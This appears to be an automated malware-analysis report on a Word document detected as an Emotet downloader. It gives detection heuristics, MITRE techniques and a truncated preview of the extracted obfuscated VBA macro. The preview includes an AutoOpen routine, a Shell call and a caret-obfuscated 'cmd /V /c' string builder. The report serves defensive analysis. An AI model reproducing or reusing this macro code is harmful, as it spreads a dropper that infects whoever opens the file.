MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6883990-0. It contains a VBA macro with an AutoOpen function, a common technique for Emotet. The macro appears to be obfuscated but is designed to download and execute a second-stage payload, consistent with Emotet's behavior.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6883990-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6883990-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16974 bytes |
SHA-256: eea77221fe52667d3d546690e8c044ac468bc9d5a5149a58374e975fd0495f8d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zmNAGjhfui"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const TARUSGZON = 0
Dim GqJzv(4)
GqJzv(0) = Right(tIANTYd, 271) + Left(iMCJl, 246) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135)
GqJzv(1) = Left(iMCJl, 246) + Mid(fmwSuvRQ, 102, 719)
GqJzv(2) = MidB(shwKz, 567, 135) + Right(tIANTYd, 271) + Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719)
GqJzv(3) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271)
Dim JjORK(3)
JjORK(0) = MidB(shwKz, 567, 135) + Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719) + Mid(fmwSuvRQ, 102, 719)
JjORK(1) = Mid(fmwSuvRQ, 102, 719) + Mid(fmwSuvRQ, 102, 719)
JjORK(2) = Left(iMCJl, 246) + Right(tIANTYd, 271) + Left(iMCJl, 246) + Left(iMCJl, 246)
Dim DLmSC(5)
DLmSC(0) = Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719)
DLmSC(1) = Left(iMCJl, 246) + MidB(shwKz, 567, 135)
DLmSC(2) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135)
DLmSC(3) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719)
DLmSC(4) = Mid(fmwSuvRQ, 102, 719) + Left(iMCJl, 246)
Dim ZBTniI(3)
ZBTniI(0) = Right(tIANTYd, 271) + Right(tIANTYd, 271)
ZBTniI(1) = Right(tIANTYd, 271) + Left(iMCJl, 246)
ZBTniI(2) = MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271)
Dim diRSNU(4)
diRSNU(0) = Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135)
diRSNU(1) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719)
diRSNU(2) = Mid(fmwSuvRQ, 102, 719) + Left(iMCJl, 246)
diRSNU(3) = MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135)
Dim aYnED(3)
aYnED(0) = Left(iMCJl, 246) + Left(iMCJl, 246)
aYnED(1) = Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135)
aYnED(2) = Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271) + Left(iMCJl, 246)
Shell@ bNFBcvwNl + ztwBlGQZG + RMEdLzdHAjK + WozXTGoIhsUmuE, TARUSGZON
Dim cajMc(4)
cajMc(0) = Left(iMCJl, 246) + MidB(shwKz, 567, 135)
cajMc(1) = Mid(fmwSuvRQ, 102, 719) + Mid(fmwSuvRQ, 102, 719)
cajMc(2) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719)
cajMc(3) = Left(iMCJl, 246) + Left(iMCJl, 246)
Dim FLDhf(3)
FLDhf(0) = MidB(shwKz, 567, 135) + Left(iMCJl, 246)
FLDhf(1) = Right(tIANTYd, 271) + Right(tIANTYd, 271)
FLDhf(2) = Left(iMCJl, 246) + Left(iMCJl, 246)
Dim CIrdqW(2)
CIrdqW(0) = Mid(fmwSuvRQ, 102, 719) + Right(tIANTYd, 271)
CIrdqW(1) = MidB(shwKz, 567, 135) + Right(tIANTYd, 271) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271)
End Sub
Attribute VB_Name = "BajUjTkqQvqWw"
Function bNFBcvwNl()
Dim MnAhk(4)
MnAhk(0) = Mid(fmwSuvRQ, 102, 719) + Left(iMCJl, 246)
MnAhk(1) = Mid(fmwSuvRQ, 102, 719) + Left(iMCJl, 246) + MidB(shwKz, 567, 135) + MidB(shwKz, 567, 135)
MnAhk(2) = Mid(fmwSuvRQ, 102, 719) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135) + Right(tIANTYd, 271)
MnAhk(3) = MidB(shwKz, 567, 135) + Left(iMCJl, 246)
kztBTXfwZU = CStr(Chr(CleanString(7 + 6 + 4 + 0 + 82))) + "md /V" + "/" + CStr(Chr(CleanString(5 + 4 + 2 + 0 + 56))) + CStr(Chr(CleanString(2 + 2 + 1 + 0 + 29))) + "^se^t ^7" + CStr(Chr(CleanString(5 + 4 + 2 + 0 + 56))) + "=^ ^ " + " ^ " + "^" + " ^ " + "^ ^ ^ ^ " + "^ }}{h" + CStr(Chr(CleanString(7 + 6 + 4 + 0 + 82))) + "t^" + "a" + CStr(Chr(CleanString(7 + 6 + 4 + 0 + 82))) + "^}^;" + "^k^a" + "^er^b^"
Dim aswvw(4)
aswvw(0) = Left(iMCJl, 246) + Right(tIANTYd, 271)
aswvw(1) = Right(tIANTYd, 271) + Right(tIANTYd, 271) + Mid(fmwSuvRQ, 102, 719) + MidB(shwKz, 567, 135)
aswvw(2) = Left(iMCJl, 246) + Left(iMCJl, 246) + Right(tIANTYd, 271) + Left(iMCJl, 246)
aswvw(3) = MidB(shwKz, 567, 135) + Mid(fmwSuvRQ, 102, 719) + Left(iM
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.